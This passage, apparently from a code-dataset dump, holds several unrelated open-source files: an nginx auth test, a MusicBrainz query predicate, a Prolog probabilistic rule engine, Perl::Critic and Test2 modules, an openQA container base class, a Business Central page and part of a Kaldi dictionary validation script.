$token = Auth::get_auth_token('./src/nginx/t/matching-client-secret-symmetric.json', 'ok_audience_1');
# OK requests need to use different api-keys to avoid service_control cache.
$response = ApiManager::http($NginxPort,<<"EOF");
GET /shelves?key=this-is-an-api-key1&access_token=$token HTTP/1.0
Host: localhost
EOF
my ($response_headers, $response_body) = split /\r\n\r\n/, $response, 2;
like($response_headers, qr/HTTP\/1\.1 200 OK/, 'Returned HTTP 200.');
unlike($response_headers, qr/WWW-Authenticate/, 'Returned auth challenge.');
is($response_body, <<'EOF', 'Shelves returned in the response body.');
{ "shelves": [
{ "name": "shelves/1", "theme": "Fiction" },
{ "name": "shelves/2", "theme": "Fantasy" }
]
}
EOF
$t->stop_daemons();
my @bookstore_requests = ApiManager::read_http_stream($t, 'bookstore.log');
is(scalar @bookstore_requests, 1, 'Backend received one request');
my $r = shift @bookstore_requests;
is($r->{verb}, 'GET', 'Backend request was a get');
like($r->{uri}, qr/\/shelves\?key=this-is-an-api-key1&access_token=\S+/, 'Backend request was get /shelves');
is($r->{headers}->{host}, "127.0.0.1:${BackendPort}", 'Host header was set.');
my @key_requests = ApiManager::read_http_stream($t, 'key.log');
is(scalar @key_requests, 1, 'There was one key request');
$r = shift @key_requests;
is($r->{verb}, 'GET', 'Key request was a get');
is($r->{uri}, '/key', 'Key uri was /key');
is($r->{headers}->{host}, "127.0.0.1:${PubkeyPort}", 'Host header was set');
# Auth OK with audience = service_name.
$t->run_daemon(\&bookstore, $t, $BackendPort, 'bookstore.log');
$t->run_daemon(\&servicecontrol, $t, $ServiceControlPort, 'servicecontrol.log');
$t->run_daemon(\&key, $t, $PubkeyPort, $key, 'key.log');
is($t->waitforsocket("127.0.0.1:${BackendPort}"), 1, 'Bookstore socket ready.');
is($t->waitforsocket("127.0.0.1:${ServiceControlPort}"), 1, 'Service control port ready.');
is($t->waitforsocket("127.0.0.1:${PubkeyPort}"), 1, 'Pubkey socket ready.');
$token = Auth::get_auth_token('./src/nginx/t/matching-client-secret-symmetric.json');
# OK requests need to use different api-keys to avoid service_control cache.
$response = ApiManager::http($NginxPort,<<"EOF");
GET /shelves?key=this-is-an-api-key2 HTTP/1.0
Host: localhost
Authorization: Bearer $token
EOF
($response_headers, $response_body) = split /\r\n\r\n/, $response, 2;
like($response_headers, qr/HTTP\/1\.1 200 OK/, 'Returned HTTP 200.');
unlike($response_headers, qr/WWW-Authenticate/, 'Returned auth challenge.');
is($response_body, <<'EOF', 'Shelves returned in the response body.');
{ "shelves": [
{ "name": "shelves/1", "theme": "Fiction" },
{ "name": "shelves/2", "theme": "Fantasy" }
]
}
EOF
$t->stop_daemons();
my @bookstore_requests = ApiManager::read_http_stream($t, 'bookstore.log');
is(scalar @bookstore_requests, 1, 'Backend received one request');
my $r = shift @bookstore_requests;
is($r->{verb}, 'GET', 'Backend request was a get');
like($r->{uri}, qr/\/shelves\?key=this-is-an-api-key2$/, 'Backend request was get /shelves');
is($r->{headers}->{host}, "127.0.0.1:${BackendPort}", 'Host header was set.');
like($r->{headers}->{authorization}, qr/Bearer \S+/, 'Backend was was authenticated.');
$no_key_requests = $t->read_file('key.log');
is($no_key_requests, '', 'No key fetch (cached).');
$t->stop();
################################################################################
sub bookstore {
my ($t, $port, $file) = @_;
my $server = HttpServer->new($port, $t->testdir() . '/' . $file)
or die "Can't create test server socket: $!\n";
local $SIG{PIPE} = 'IGNORE';
$server->on('GET', '/shelves', <<'EOF');
HTTP/1.1 200 OK
Connection: close
{ "shelves": [
{ "name": "shelves/1", "theme": "Fiction" },
{ "name": "shelves/2", "theme": "Fantasy" }
]
}
EOF
$server->run();
}
sub servicecontrol {
my ($t, $port, $file) = @_;
my $server = HttpServer->new($port, $t->testdir() . '/' . $file)
or die "Can't create test server socket: $!\n";
local $SIG{PIPE} = 'IGNORE';
$server->on('POST', '/v1/services/endpoints-test.cloudendpointsapis.com:check', <<'EOF');
HTTP/1.1 200 OK
Connection: close
EOF
$server->run();
}
sub key {
my ($t, $port, $secret, $file) = @_;
my $server = HttpServer->new($port, $t->testdir() . '/' . $file)
or die "Can't create test server socket: $!\n";
local $SIG{PIPE} = 'IGNORE';
$server->on('GET', '/key', <<"EOF");
HTTP/1.1 200 OK
Connection: close
$secret
EOF
$server->run();
}
==== File: lib/MusicBrainz/Server/EditSearch/Predicate/EditNoteContent.pm (repo kellnerd/musicbrainz-server, license BSD-2-Clause) ====
package MusicBrainz::Server::EditSearch::Predicate::EditNoteContent;
use Moose;
with 'MusicBrainz::Server::EditSearch::Predicate';
sub operator_cardinality_map {
return (
'includes' => undef,
)
}
sub combine_with_query {
my ($self, $query) = @_;
my @patterns = map {
$_ =~ s/\\/\\\\/g;
$_ =~ s/_/\\_/g;
$_ =~ s/%/\\%/g;
'%' . $_ . '%'
} @{ $self->sql_arguments };
$query->add_where([
'EXISTS (
SELECT TRUE FROM edit_note
WHERE edit_note.text ILIKE ?
AND edit_note.edit = edit.id
)',
\@patterns,
]);
};
1;
=head1 COPYRIGHT AND LICENSE
Copyright (C) 2015-2017 MetaBrainz Foundation
This file is part of MusicBrainz, the open internet music database,
and is licensed under the GPL version 2, or (at your option) any
later version: http://www.gnu.org/licenses/gpl-2.0.txt
=cut
==== File: ProbRules.pl (repo sysbio-bioinf/ProbRules, license Apache-2.0, SWI-Prolog source) ====
:- op(50, xfx, ::).
:- op(70, fx, not).
:- discontiguous (::)/2.
:- multifile rule/5.
:- multifile fixed/3.
%! evaluation(+Timepoint:int) is det.
%
% The entry point to this application.
% Computes and prints the state of the probabilistic interactions at
% each timepoint from 0 to Timepoint.
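% Example query (assuming the consulted model supplies the probabilistic facts
% and the rule/5 and fixed/3 clauses this engine expects):
%   ?- evaluation(20).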
evaluation(S0) :-
succ(S0, S),
initialize_variables(Assoc),
init_visualize(Assoc),
visualize(0, Assoc),
evaluation(1, S, Assoc).
evaluation(S, S, _) :- !.
evaluation(A, S, Assoc) :-
newvalues(A, Assoc, New_Assoc),
visualize(A, New_Assoc),
succ(A, A1),
evaluation(A1, S, New_Assoc).
%! initialize_variables(-Assoc) is det.
%
% Initialize Assoc with the probabilistic terms in the knowledge
% base. Atoms are keys, probabilities are values.
initialize_variables(Assoc) :-
empty_assoc(Assoc0),
setof(X-P, P::X, Interactions),
update_facts_assoc(Interactions, Assoc0, Assoc).
%! init_visualize(+Assoc) is det.
%
% Print a single tab-separated line with the probabilistic
% interaction identifiers that serve as keys in Assoc (sorted asc).
init_visualize(Assoc) :-
assoc_to_keys(Assoc, Xs),
findall((A, B), member(interaction(A, B), Xs), Interactions),
forall(member(Interaction, Interactions),
format('\t(~w)', [Interaction])),
format('~n', []).
%! visualize(+Iteration, +Assoc:association_list) is det.
%
% Print a tab-separated line of interaction probabilities
% (sorted asc). An iteration number is prepended to the line.
visualize(Iteration, Assoc) :-
assoc_to_list(Assoc, Xs),
format('~w\t', [Iteration]),
forall(member(interaction(_,_)-X, Xs), format('~w\t', [X])),
format('~n', []).
%! newvalues(T, Assoc, New_Assoc) is det.
%
% Generate values for the next time point.
% For each interaction (i.e. key) in Assoc do:
% - check which rules are applicable and compute their target scores.
% - take the average and associate it as the new value.
newvalues(T, Assoc, New_Assoc) :-
assoc_to_keys(Assoc, Probabilistic_Atoms),
findall(interaction(A,B),
member(interaction(A,B), Probabilistic_Atoms),
Interactions),
newvalues_helper(T, Interactions, Assoc, New_Interactions),
update_facts_assoc(New_Interactions, Assoc, New_Assoc).
%! average(+Xs:number_list, -Y:number) is det.
%
% Y is the average of the values in Xs.
average(Xs, Y) :-
sum_list(Xs, T),
length(Xs, L),
Y is T / L.
%! newvalues_helper(+Timepoint:int,
%! +Interactions,
%! +Assoc:association_list,
%! +Interaction_Probabilities) is det.
%
% For each interaction in Interactions its probability for timepoint
% Timepoint is computed and stored in Interaction_Probabilities.
%
% The probability of an interaction is computed as follows:
% - If a fixed probability for Interaction at timepoint Timepoint is
% known, this becomes its probability.
% - Otherwise, collect all rules potentially affecting Interaction
% and compute the probability using interaction_probability/4.
newvalues_helper(_, [], _, []) :- !. % Ideally SWI Prolog would be
% able to identify that the empty
% list is mutually exclusive with
% the other clause for these
% arguments, however this is
% currently not the case, hence
% the cut to avoid a useless
% choice point.
newvalues_helper(A, [Interaction | Xs], Assoc, [Interaction-P | Ys]) :-
( static(A, Assoc, Interaction, P), !
; findall(Conditions-(Attack_Rate, Target_Probability),
dynamics(Interaction, Conditions, Target_Probability, Attack_Rate),
Rules),
interaction_probability(Interaction, Assoc, Rules, P)
),
newvalues_helper(A, Xs, Assoc, Ys).
%! static(+Timepoint:int,
%! +Assoc:association_list,
%! +Interaction,
%! -P:probability) is semidet.
%
% Returns the probability P of a given Interaction at timepoint
% Timepoint in case a fixed/3 statement is applicable.
% Fails if not.
static(Timepoint, Assoc, interaction(X, Y), P) :-
clause(fixed(X, Y, Timepoint), Body),
conj_to_list(Body, Body_Literals),
process(Assoc, Body_Literals, Ps),
product(Ps, P).
%! conj_to_list(Xs:conjunction, Ys:list) is det.
%
% Ys is the order-preserved list of terms that made up Xs.
conj_to_list(','(H, Conj), [H | T]) :-
!,
conj_to_list(Conj, T).
conj_to_list(H, [H]).
%! process(+Assoc:association_list,
%! +Xs:list,
%! -Ys:probability_list) is semidet.
%
% Ys are the probabilities associated with their respective
% terms in Xs.
% Xs can contain probabilistic as well as nonprobabilistic terms
% (assumed to be det). The deterministic terms are called using call/1.
% The probability associated with a deterministic term is the
% neutral element for multiplication 1.
process(_, [], []).
process(Assoc, [X|Xs], [P|Ps]) :-
process_literal(Assoc, X, P),
process(Assoc, Xs, Ps).
process_literal(Assoc, X, P) :-
( get_assoc(X, Assoc, P), !
; call(X), P = 1
).
dynamics(interaction(X, Y), Conditions, Target_Probability, Attack_Rate) :-
rule((X, Y), Conditions, Target_Probability, Attack_Rate, _Description).
%! evaluate_conditions(+Conditions:list,
%! +Assoc:association_list,
%! -P:probability) is semidet.
%
% P is the probability that the probabilistic variables in
% Conditions hold.
%
% Conditions contains positive or negated independent probabilistic facts.
% Assoc has interactions (interaction/2) as keys and probabilities
% as values.
% If Conditions = [] then P = 1.
% If length(Conditions, L), L > 0 then a probability is derived from
% a condition by taking its probability from
% Assoc and taking the complement in case it is negated.
% P then equals the product of all probabilities.
evaluate_conditions(Conditions, Assoc, P) :-
maplist(condition_probability(Assoc), Conditions, Probabilities),
product(Probabilities, P).
%! condition_probability(+Assoc:association_list,
%! +Condition,
%! -P:probability) is semidet.
%
% If Condition is positive, then P is the probability specified by
% the interaction/2 associated with Condition
% in Assoc.
% If Condition is negated, then P is the complement of that probability.
condition_probability(Assoc, not (X, Y), P) :-
get_assoc(interaction(X, Y), Assoc, P0),
P is 1 - P0.
condition_probability(Assoc, (X, Y), P) :-
get_assoc(interaction(X, Y), Assoc, P).
%! update_facts_assoc(+Probabilistic_Facts:pairs,
%! +Assoc_In:association_list,
%! -Assoc_Out:association_list) is det.
%
% Assoc_Out is Assoc_In extended with each pair (serving as
% (Key,Value)) of Probabilistic_Facts.
update_facts_assoc([], Assoc, Assoc).
update_facts_assoc([Fact-P | Xs], Assoc0, Assoc) :-
put_assoc(Fact, Assoc0, P, Assoc1),
update_facts_assoc(Xs, Assoc1, Assoc).
%! product(+Xs:numberlist, -P:number) is det.
%
% True if P is the product of the elements in Xs.
product(Xs, P) :-
product_helper(Xs, 1, P).
product_helper([], Acc, P) :-
P is Acc.
product_helper([X | Xs], Acc, P) :-
product_helper(Xs, X * Acc, P).
%! interaction_probability(+Interaction,
%! +Assoc:association_list,
%! +Xs,
%! -P:probability) is semidet.
%
% P is the probability of Interaction by taking into account
% the potential effects of the rules in Xs on its state in the
% previous time point as stored in Assoc.
%
% Format of Xs = [[(i,p)]-(global_attack,on),
% [(x,z), not (y,z)]-(global_attack, on)]
interaction_probability(Interaction, Assoc, Xs, P) :-
findall(P,
(annotated_rules(Xs, World),
evaluate_world(Assoc, Interaction, World, P)),
Ps),
sum_list(Ps, P).
%! evaluate_world(+Assoc:association_list,
%! +Interaction,
%! +Xs,
%! -Probability) is semidet.
%
% Xs is a set of rules associated with a particular Interaction
% evaluated against a particular World. The World in question
% is one world consisting of the variables used in the conditions of
% that set of rules. Status indicates whether a particular Rule is
% active in the World.
%
% - If all the rules are evaluated as false in a particular world,
% then the decay rule applies. The Weight of the world is used for
% the Condition probability in the decay rule formula, except when
% Xs = [], since then the rules affecting the Interaction have no
% conditions (i.e. are always satisfied), in which case the Condition
% probability is 1.
% - If some rule is evaluated as true, then the probability of
% each true rule is evaluated separately using the effective
% rule formula, and then resulting probability are averaged out.
%
% Note: format of Xs: for X in Xs:
% X = World-Condition-(Attack_Rate, Target_Probability)-Status
% where
% - World = one World (truth table generated) over the variables
% used in the conditions of the rules affecting Interaction.
% - Condition = the Condition that triggers a particular rule
% on Interaction.
% - Attack_Rate = The attack rate of that some rule.
% - Target_Probability = The target probability of that same rule.
% - Status = Whether Condition actually holds in World.
evaluate_world(Assoc, Interaction, Xs, Probability) :-
( maplist(status(false), Xs) ->
get_assoc(global_decay, Assoc, Global_Decay),
get_assoc(Interaction, Assoc, Previous_P),
Initial_P :: Interaction,
( memberchk(World-_-_-_, Xs) ->
evaluate_conditions(World, Assoc, Condition)
;
Condition = 1
),
default_decay_rule_formula(Condition, Global_Decay, Initial_P, Previous_P, Probability)
;
include(status(true), Xs, Ys),
maplist(evaluate(Assoc, Interaction), Ys, Ps),
average(Ps, Probability)
).
%! evaluate(+Assoc,
%! +Interaction,
%! +World_Rule,
%! -P) is semidet.
%
% World_Rule = World-_-(Target_Probability_Atom,Attack_Rate_Atom)-_
%
% P is the probability as specified by the formal effective rule
% formula for Interaction where
% - the condition probability is the probability of World.
% - the Target Probability and Attack Rate is explicitly provided
% through atoms that can be used as keys in Assoc.
% - Interaction is used as a key in Assoc to retrieve its
% probability at the previous time point.
evaluate(Assoc, Interaction, World-_-(Target_Probability_Atom, Attack_Rate_Atom)-_, P) :-
evaluate_conditions(World, Assoc, Condition_P),
get_assoc(Target_Probability_Atom, Assoc, Target_Probability),
get_assoc(Attack_Rate_Atom, Assoc, Attack_Rate),
get_assoc(Interaction, Assoc, Previous_P),
effective_rule_formula(Condition_P, Target_Probability, Attack_Rate, Previous_P, P).
%! default_decay_rule_formula(+Condition:probability,
%! +Global_Decay:probability,
%! +Initial_P:probability,
%! +Previous_P:probability,
%! -P:probability) is det.
%
% P is the probability as specified by the formal default decay rule formula.
default_decay_rule_formula(Condition, Global_Decay, Initial_P, Previous_P, P) :-
P is Condition * ((1 - Global_Decay) * Previous_P + Global_Decay * Initial_P).
%! effective_rule_formula(+Condition:probability,
%! +Target_Probability:probability,
%! +Attack_Rate:probability,
%! +Previous_P:probability,
%! -P:probability) is det.
%
% P is the probability as specified by the formal effective rule formula.
effective_rule_formula(Condition, Target_Probability, Attack_Rate, Previous_P, P) :-
P is Condition * ((Target_Probability * Attack_Rate) + (1 - Attack_Rate ) * Previous_P).
status(State, _-_-_-State).
%! annotated_rules(+Rules, -World_Rules_Satisfied:hyphen_quadruple_list) is multi
%
% World_Rules_Satisfied is a list of quadruples.
% Each binding of World_Rules_Satisfied is a list of Rules
% evaluated against a particular World. Upon backtracking a list for
% each possible world is returned.
annotated_rules(Rules, World_Rules_Satisfied) :-
condition_TA_Pairs_condition_set(Rules, Condition_Variables),
random_variables_world(Condition_Variables, World),
maplist(condition_satisfaction_in_world(World), Rules, World_Rules_Satisfied).
%! condition_satisfaction_in_world(+World,
%! +Condition_L:hyphen_pair,
%! -World_Conditions_L_State:hyphen_quadruple)
%! is det.
%
% State is true if Conditions are satisfied by World.
% That is, if each element in Conditions is a member of World.
% State is false otherwise.
condition_satisfaction_in_world(World, Conditions-L, World-Conditions-L-State) :-
( forall(member(Condition, Conditions), member(Condition, World))
-> State = true
; State = false
).
%! condition_TA_Pairs_condition_set(+Condition_TA_Pairs:pairs,
%! -Condition_Set:set) is det.
%
% Condition_Set is the set of interactions contained in the
% keys (a key is a list of positive or negated interactions) of
% Condition_TA_Pairs.
condition_TA_Pairs_condition_set(Condition_TA_Pairs, Condition_Set) :-
pairs_keys(Condition_TA_Pairs, Condition_Lists),
append(Condition_Lists, Conditions),
peeled_negation(Conditions, Positive_Conditions),
sort(Positive_Conditions, Condition_Set).
%! peeled_negation(+Xs:list, -Ys:list) is det.
%
% True if Ys is Xs with one layer of not/1 peeled off.
% not/1 represents negation.
% If an element in Xs is negated, then that single negation is removed in Ys
% If an element in Xs is not negated, then that element is left unchanged
% in Ys.
peeled_negation([], []).
peeled_negation([X | Xs], [Y | Ys]) :-
( X = not Condition
-> Y = Condition
; Y = X
),
peeled_negation(Xs, Ys).
%! random_variables_world(+In:list, -Out:list) is multi.
%
% Out is a row in the truth table derived from the variables
% in In. Upon backtracking each row from the truth table is
% generated.
%
% if length(In, L), L>0 then random_variables_world/2 succeeds 2**L
% times.
% if length(In, 0) then random_variables_world/2 succeeds exactly
% once with Out = [].
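% For example (illustrative):
%   ?- random_variables_world([a,b], W).
%   W = [a, b] ;
%   W = [a, not b] ;
%   W = [not a, b] ;
%   W = [not a, not b].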
random_variables_world([], []).
random_variables_world([X | Xs], [X | Ys]) :-
random_variables_world(Xs, Ys).
random_variables_world([X | Xs], [not(X) | Ys]) :-
random_variables_world(Xs, Ys).
==== File: lib/Perl/Critic/Policy/ControlStructures/ProhibitCStyleForLoops.pm (repo rurban/Perl-Critic, license Artistic-1.0) ====
package Perl::Critic::Policy::ControlStructures::ProhibitCStyleForLoops;
use 5.006001;
use strict;
use warnings;
use Readonly;
use Perl::Critic::Utils qw{ :characters :severities };
use base 'Perl::Critic::Policy';
our $VERSION = '1.121_01';
#-----------------------------------------------------------------------------
Readonly::Scalar my $DESC => q{C-style "for" loop used};
Readonly::Scalar my $EXPL => [ 100 ];
#-----------------------------------------------------------------------------
sub supported_parameters { return () }
sub default_severity { return $SEVERITY_LOW }
sub default_themes { return qw( core pbp maintenance ) }
sub applies_to { return 'PPI::Structure::For' }
#-----------------------------------------------------------------------------
sub violates {
my ( $self, $elem, undef ) = @_;
if ( _is_cstyle($elem) ) {
return $self->violation( $DESC, $EXPL, $elem );
}
return; #ok!
}
sub _is_cstyle {
my $elem = shift;
my $nodes_ref = $elem->find('PPI::Token::Structure');
return if !$nodes_ref;
my @semis = grep { $_ eq $SCOLON } @{$nodes_ref};
return scalar @semis == 2;
}
1;
__END__
#-----------------------------------------------------------------------------
=pod
=head1 NAME
Perl::Critic::Policy::ControlStructures::ProhibitCStyleForLoops - Write C<for(0..20)> instead of C<for($i=0; $i<=20; $i++)>.
=head1 AFFILIATION
This Policy is part of the core L<Perl::Critic|Perl::Critic>
distribution.
=head1 DESCRIPTION
The 3-part C<for> loop that Perl inherits from C is butt-ugly, and
only really necessary if you need irregular counting. The very
Perlish C<..> operator is much more elegant and readable.
for($i=0; $i<=$max; $i++){ #ick!
do_something($i);
}
for(0..$max){ #very nice
do_something($_);
}
=head1 CONFIGURATION
This Policy is not configurable except for the standard options.
=head1 AUTHOR
Jeffrey Ryan Thalhammer <jeff@imaginative-software.com>
=head1 COPYRIGHT
Copyright (c) 2005-2011 Imaginative Software Systems. All rights reserved.
This program is free software; you can redistribute it and/or modify
it under the same terms as Perl itself. The full text of this license
can be found in the LICENSE file included with this module.
=cut
# Local Variables:
# mode: cperl
# cperl-indent-level: 4
# fill-column: 78
# indent-tabs-mode: nil
# c-indentation-style: bsd
# End:
# ex: set ts=8 sts=4 sw=4 tw=78 ft=perl expandtab shiftround :
| 24.913462 | 124 | 0.575839 |
ed36f4e250944eb7809940be01b99c5a6f71e816 | 1,431 | pm | Perl | fatlib/Test2/Hub/Interceptor.pm | AntonioJavierRP/CC-18-19 | fbe224bdf8abd3cf8aa42cf7b7b0c0f9ebd2ca04 | [
"Artistic-2.0"
] | 2 | 2021-10-20T00:25:39.000Z | 2021-11-08T12:52:42.000Z | fatlib/Test2/Hub/Interceptor.pm | AntonioJavierRP/CC-18-19 | fbe224bdf8abd3cf8aa42cf7b7b0c0f9ebd2ca04 | [
"Artistic-2.0"
] | null | null | null | fatlib/Test2/Hub/Interceptor.pm | AntonioJavierRP/CC-18-19 | fbe224bdf8abd3cf8aa42cf7b7b0c0f9ebd2ca04 | [
"Artistic-2.0"
] | 1 | 2022-03-14T06:41:16.000Z | 2022-03-14T06:41:16.000Z | package Test2::Hub::Interceptor;
use strict;
use warnings;
our $VERSION = '1.302120';
use Test2::Hub::Interceptor::Terminator();
BEGIN { require Test2::Hub; our @ISA = qw(Test2::Hub) }
use Test2::Util::HashBase;
sub init {
my $self = shift;
$self->SUPER::init;
$self->{+NESTED} = 0;
}
sub inherit {
my $self = shift;
my ($from, %params) = @_;
$self->{+NESTED} = 0;
if ($from->{+IPC} && !$self->{+IPC} && !exists($params{ipc})) {
my $ipc = $from->{+IPC};
$self->{+IPC} = $ipc;
$ipc->add_hub($self->{+HID});
}
}
sub terminate {
my $self = shift;
my ($code) = @_;
eval {
no warnings 'exiting';
last T2_SUBTEST_WRAPPER;
};
my $err = $@;
# Fallback
die bless(\$err, 'Test2::Hub::Interceptor::Terminator');
}
1;
__END__
=pod
=encoding UTF-8
=head1 NAME
Test2::Hub::Interceptor - Hub used by interceptor to grab results.
=head1 SOURCE
The source code repository for Test2 can be found at
F<http://github.com/Test-More/test-more/>.
=head1 MAINTAINERS
=over 4
=item Chad Granum E<lt>exodist@cpan.orgE<gt>
=back
=head1 AUTHORS
=over 4
=item Chad Granum E<lt>exodist@cpan.orgE<gt>
=back
=head1 COPYRIGHT
Copyright 2017 Chad Granum E<lt>exodist@cpan.orgE<gt>.
This program is free software; you can redistribute it and/or
modify it under the same terms as Perl itself.
See F<http://dev.perl.org/licenses/>
=cut
| 16.078652 | 67 | 0.621244 |
ed1d5d2102fb3338c9a1a9f143b5a143b9d52167 | 667 | pm | Perl | lib/containers/basetest.pm | acerv/os-autoinst-distri-opensuse | 0e0cfca02f3a86323682c511a1efa926c7f0df3a | [
"FSFAP"
] | 2 | 2017-11-29T19:04:30.000Z | 2017-11-29T19:04:31.000Z | lib/containers/basetest.pm | acerv/os-autoinst-distri-opensuse | 0e0cfca02f3a86323682c511a1efa926c7f0df3a | [
"FSFAP"
] | 2 | 2021-12-10T20:25:24.000Z | 2021-12-13T16:45:47.000Z | lib/containers/basetest.pm | acerv/os-autoinst-distri-opensuse | 0e0cfca02f3a86323682c511a1efa926c7f0df3a | [
"FSFAP"
] | 2 | 2015-02-27T07:34:58.000Z | 2015-05-15T09:24:55.000Z | # SUSE's openQA tests
#
# Copyright 2021 SUSE LLC
# SPDX-License-Identifier: FSFAP
# Summary: Base class for container tests
# Maintainer: qac team <qa-c@suse.de>
package containers::basetest;
use containers::docker;
use containers::podman;
use Mojo::Base 'opensusebasetest';
sub containers_factory {
my ($self, $runtime) = @_;
my $engine;
if ($runtime eq 'docker') {
$engine = containers::docker->new();
}
elsif ($runtime eq 'podman') {
$engine = containers::podman->new();
}
else {
die("Unknown runtime $runtime. Only 'docker' and 'podman' are allowed.");
}
$engine->init();
return $engine;
}
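# Illustrative use from a subclassing test module (a sketch only; in
# practice the runtime name would come from the test settings rather than
# being hard-coded):
#
#   use Mojo::Base 'containers::basetest';
#
#   sub run {
#       my ($self) = @_;
#       my $engine = $self->containers_factory('podman');
#       # ... exercise $engine ...
#   }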
1;
| 20.84375 | 81 | 0.631184 |
eda420924e14351b27ebcd0672a76af2840d5f9e | 941 | al | Perl | Apps/IN/INTDS/app/TDSBase/src/page/SectionDetail.Page.al | MiguelMercadoActual/ALAppExtensions | 97ee3823053eb32fa7e38dc3d1e7a89bdcca8d7b | [
"MIT"
] | 337 | 2019-05-07T06:04:40.000Z | 2022-03-31T10:07:42.000Z | Apps/IN/INTDS/app/TDSBase/src/page/SectionDetail.Page.al | MiguelMercadoActual/ALAppExtensions | 97ee3823053eb32fa7e38dc3d1e7a89bdcca8d7b | [
"MIT"
] | 14,850 | 2019-05-07T06:04:27.000Z | 2022-03-31T19:53:28.000Z | Apps/IN/INTDS/app/TDSBase/src/page/SectionDetail.Page.al | MiguelMercadoActual/ALAppExtensions | 97ee3823053eb32fa7e38dc3d1e7a89bdcca8d7b | [
"MIT"
] | 374 | 2019-05-09T10:08:14.000Z | 2022-03-31T17:48:32.000Z | page 18688 "Section Detail"
{
PageType = StandardDialog;
SourceTable = "TDS Section";
layout
{
area(Content)
{
group(Details)
{
field(SectionDetail; SectionDetail)
{
ApplicationArea = Basic, Suite;
Caption = 'Section Details';
MultiLine = true;
ToolTip = 'Specify additional details for the TDS section.';
}
}
}
}
trigger OnQueryClosePage(CloseAction: Action): Boolean
begin
if CloseAction in [Action::OK, Action::LookupOK] then
TDSEntityManagement.SetDetailTxt(SectionDetail, Rec);
end;
trigger OnOpenPage()
begin
SectionDetail := TDSEntityManagement.GetDetailTxt(rec);
end;
var
TDSEntityManagement: Codeunit "TDS Entity Management";
SectionDetail: Text;
} | 25.432432 | 80 | 0.544102 |
eda3b3c81ff3ea2dd45fd2202ee03ffdbb28fedd | 11,748 | pl | Perl | egs/wsj/s5/utils/validate_dict_dir.pl | liu4lin/kaldi-trunk | 2486bf90b02128bc5d480bd6f8daa2b47b274c66 | [
"Apache-2.0"
] | 1 | 2019-02-06T09:31:59.000Z | 2019-02-06T09:31:59.000Z | egs/wsj/s5/utils/validate_dict_dir.pl | Shuang777/kaldi | 3df67141b55cfd5e2ba7305a72e795e7706d8d30 | [
"Apache-2.0"
] | null | null | null | egs/wsj/s5/utils/validate_dict_dir.pl | Shuang777/kaldi | 3df67141b55cfd5e2ba7305a72e795e7706d8d30 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/perl
# Apache 2.0.
# Guoguo Chen (guoguo@jhu.edu)
# Daniel Povey (dpovey@gmail.com)
#
# Validation script for data/local/dict
if(@ARGV != 1) {
die "Usage: validate_dict_dir.pl dict_directory\n";
}
$dict = shift @ARGV;
$dict =~ s:/$::;
$exit = 0;
$success = 1; # this is re-set each time we read a file.
sub set_to_fail { $exit = 1; $success = 0; }
# Checking silence_phones.txt -------------------------------
print "Checking $dict/silence_phones.txt ...\n";
if(-z "$dict/silence_phones.txt") {print "--> ERROR: $dict/silence_phones.txt is empty or not exists\n"; exit 1;}
if(!open(S, "<$dict/silence_phones.txt")) {print "--> ERROR: fail to open $dict/silence_phones.txt\n"; exit 1;}
$idx = 1;
%silence = ();
print "--> reading $dict/silence_phones.txt\n";
while(<S>) {
if (! s/\n$//) {
print "--> ERROR: last line '$_' of $dict/silence_phones.txt does not end in newline.\n";
set_to_fail();
}
my @col = split(" ", $_);
if (@col == 0) {
set_to_fail();
print "--> ERROR: empty line in $dict/silence_phones.txt (line $idx)\n";
}
foreach(0 .. @col-1) {
my $p = $col[$_];
if($silence{$p}) {set_to_fail(); print "--> ERROR: phone \"$p\" duplicates in $dict/silence_phones.txt (line $idx)\n"; }
else {$silence{$p} = 1;}
if ($p =~ m/_$/ || $p =~ m/#/ || $p =~ m/_[BESI]$/){
set_to_fail();
print "--> ERROR: phone \"$p\" has disallowed written form";
}
}
$idx ++;
}
close(S);
$success == 0 || print "--> $dict/silence_phones.txt is OK\n";
print "\n";
# Checking optional_silence.txt -------------------------------
print "Checking $dict/optional_silence.txt ...\n";
if(-z "$dict/optional_silence.txt") {print "--> ERROR: $dict/optional_silence.txt is empty or not exists\n"; exit 1;}
if(!open(OS, "<$dict/optional_silence.txt")) {print "--> ERROR: fail to open $dict/optional_silence.txt\n"; exit 1;}
$idx = 1;
$success = 1;
print "--> reading $dict/optional_silence.txt\n";
while(<OS>) {
chomp;
my @col = split(" ", $_);
if ($idx > 1 or @col > 1) {
set_to_fail(); print "--> ERROR: only 1 phone expected in $dict/optional_silence.txt\n";
} elsif (!$silence{$col[0]}) {
set_to_fail(); print "--> ERROR: phone $col[0] not found in $dict/silence_phones.txt\n";
}
$idx ++;
}
close(OS);
$success == 0 || print "--> $dict/optional_silence.txt is OK\n";
print "\n";
# Checking nonsilence_phones.txt -------------------------------
print "Checking $dict/nonsilence_phones.txt ...\n";
if(-z "$dict/nonsilence_phones.txt") {print "--> ERROR: $dict/nonsilence_phones.txt is empty or not exists\n"; exit 1;}
if(!open(NS, "<$dict/nonsilence_phones.txt")) {print "--> ERROR: fail to open $dict/nonsilence_phones.txt\n"; exit 1;}
$idx = 1;
%nonsilence = ();
$success = 1;
print "--> reading $dict/nonsilence_phones.txt\n";
while(<NS>) {
if (! s/\n$//) {
print "--> ERROR: last line '$_' of $dict/nonsilence_phones.txt does not end in newline.\n";
set_to_fail();
}
my @row = split(" ", $_);
if (@row == 0) {
set_to_fail();
print "--> ERROR: empty line in $dict/nonsilence_phones.txt (line $idx)\n";
}
foreach(0 .. @row-1) {
my $p = $row[$_];
if($nonsilence{$p}) {set_to_fail(); print "--> ERROR: phone \"$p\" duplicates in $dict/nonsilence_phones.txt (line $idx)\n"; }
else {$nonsilence{$p} = 1;}
if ($p =~ m/_$/ || $p =~ m/#/ || $p =~ m/_[BESI]$/){
set_to_fail();
print "--> ERROR: phone \"$p\" has disallowed written form";
}
}
$idx ++;
}
close(NS);
$success == 0 || print "--> $dict/nonsilence_phones.txt is OK\n";
print "\n";
# Checking disjoint -------------------------------
sub intersect {
my ($a, $b) = @_;
@itset = ();
%itset = ();
foreach(keys %$a) {
if(exists $b->{$_} and !$itset{$_}) {
push(@itset, $_);
$itset{$_} = 1;
}
}
return @itset;
}
print "Checking disjoint: silence_phones.txt, nonsilence_phones.txt\n";
@itset = intersect(\%silence, \%nonsilence);
if(@itset == 0) {print "--> disjoint property is OK.\n";}
else {set_to_fail(); print "--> ERROR: silence_phones.txt and nonsilence_phones.txt has overlap: "; foreach(@itset) {print "$_ ";} print "\n";}
print "\n";
